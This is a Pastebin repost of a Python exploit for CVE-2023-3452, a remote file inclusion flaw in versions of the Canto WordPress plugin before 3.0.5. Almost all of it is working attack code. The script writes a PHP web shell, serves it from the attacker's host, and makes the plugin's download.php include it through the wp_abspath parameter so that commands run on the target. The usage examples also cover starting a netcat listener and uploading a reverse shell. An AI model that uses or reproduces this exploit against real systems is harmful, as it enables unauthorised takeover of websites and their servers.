Advertisement
FlyFar

Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion and Remote Code Execution - CVE-2023-3452

Mar 1st, 2024
2,306
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.74 KB | Cybersecurity | 0 0
  1. # Exploit Title: Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
  2. # Date: 04/11/2023
  3. # Exploit Author: Leopoldo Angulo (leoanggal1)
  4. # Vendor Homepage: https://wordpress.org/plugins/canto/
  5. # Software Link: https://downloads.wordpress.org/plugin/canto.3.0.4.zip
  6. # Version: All versions of Canto Plugin prior to 3.0.5
  7. # Tested on: Ubuntu 22.04, Wordpress 6.3.2, Canto Plugin 3.0.4
  8. # CVE : CVE-2023-3452
  9.  
  10. #PoC Notes:
  11. #The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. (Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-3452)
  12. #This code exploits the improper handling of the wp_abspath variable in the following line of the "download.php" code:
  13. #... require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php'); ...
  14. #This is just an example but there is this same misconfiguration in other lines of the vulnerable plugin files.
  15. # More information in Leoanggal1's Github
  16.  
  17. #!/usr/bin/python3
  18. import argparse
  19. import http.server
  20. import socketserver
  21. import threading
  22. import requests
  23. import os
  24. import subprocess
  25.  
  26. # Define the default web shell
  27. default_web_shell = "<?php system($_GET['cmd']); ?>"
  28.  
  29. def create_admin_file(local_dir, local_shell=None):
  30.     if not os.path.exists(local_dir):
  31.         os.makedirs(local_dir)
  32.  
  33.     # If a local shell is provided, use it; otherwise, use the default web shell
  34.     if local_shell:
  35.         with open(f"{local_dir}/admin.php", "wb") as admin_file:
  36.             with open(local_shell, "rb") as original_file:
  37.                 admin_file.write(original_file.read())
  38.     else:
  39.         with open(f"{local_dir}/admin.php", "w") as admin_file:
  40.             admin_file.write(default_web_shell)
  41.  
  42. def start_local_server(local_port):
  43.     Handler = http.server.SimpleHTTPRequestHandler
  44.     httpd = socketserver.TCPServer(("0.0.0.0", local_port), Handler)
  45.  
  46.     print(f"Local web server on port {local_port}...")
  47.     httpd.serve_forever()
  48.  
  49.     return httpd
  50.  
  51. def exploit_rfi(url, local_shell, local_host, local_port, command, nc_port):
  52.     local_dir = "wp-admin"
  53.     create_admin_file(local_dir, local_shell)
  54.  
  55.     target_url = f"{url}/wp-content/plugins/canto/includes/lib/download.php"
  56.     local_server = f"http://{local_host}:{local_port}"
  57.     command = f"cmd={command}"
  58.  
  59.     if local_shell:
  60.         # If a local shell is provided, start netcat on the specified port
  61.         subprocess.Popen(["nc", "-lvp", str(nc_port)])
  62.  
  63.     server_thread = threading.Thread(target=start_local_server, args=(local_port,))
  64.     server_thread.daemon = True
  65.     server_thread.start()
  66.  
  67.     exploit_url = f"{target_url}?wp_abspath={local_server}&{command}"
  68.     print(f"Exploitation URL: {exploit_url}")
  69.  
  70.     response = requests.get(exploit_url)
  71.     print("Server response:")
  72.     print(response.text)
  73.  
  74.     # Shutdown the local web server
  75.     print("Shutting down local web server...")
  76.     server_thread.join()
  77.  
  78. if __name__ == "__main__":
  79.     examples = '''
  80.    Examples:
  81.    - Check the vulnerability
  82.    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33
  83.  
  84.    - Execute a command
  85.    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'
  86.  
  87.    - Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom.
  88.    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php
  89.    '''
  90.     parser = argparse.ArgumentParser(description="Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452", epilog=examples, formatter_class=argparse.RawDescriptionHelpFormatter)
  91.     parser.add_argument("-u", "--url", required=True, default=None,  help="Vulnerable URL")
  92.     parser.add_argument("-s", "--shell", help="Local file for web shell")
  93.     parser.add_argument("-LHOST", "--local_host", required=True, help="Local web server IP")
  94.     parser.add_argument("-LPORT", "--local_port", help="Local web server port")
  95.     parser.add_argument("-c", "--command", default="whoami", help="Command to execute on the target")
  96.     parser.add_argument("-NC_PORT", "--nc_port", type=int, help="Listener port for netcat")
  97.  
  98.     try:
  99.         args = parser.parse_args()
  100.  
  101.         if args.local_port is None:
  102.             args.local_port = 8080  # Valor predeterminado si LPORT no se proporciona
  103.         exploit_rfi(args.url, args.shell, args.local_host, int(args.local_port), args.command, args.nc_port)
  104.  
  105.     except SystemExit:
  106.         parser.print_help()
  107.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement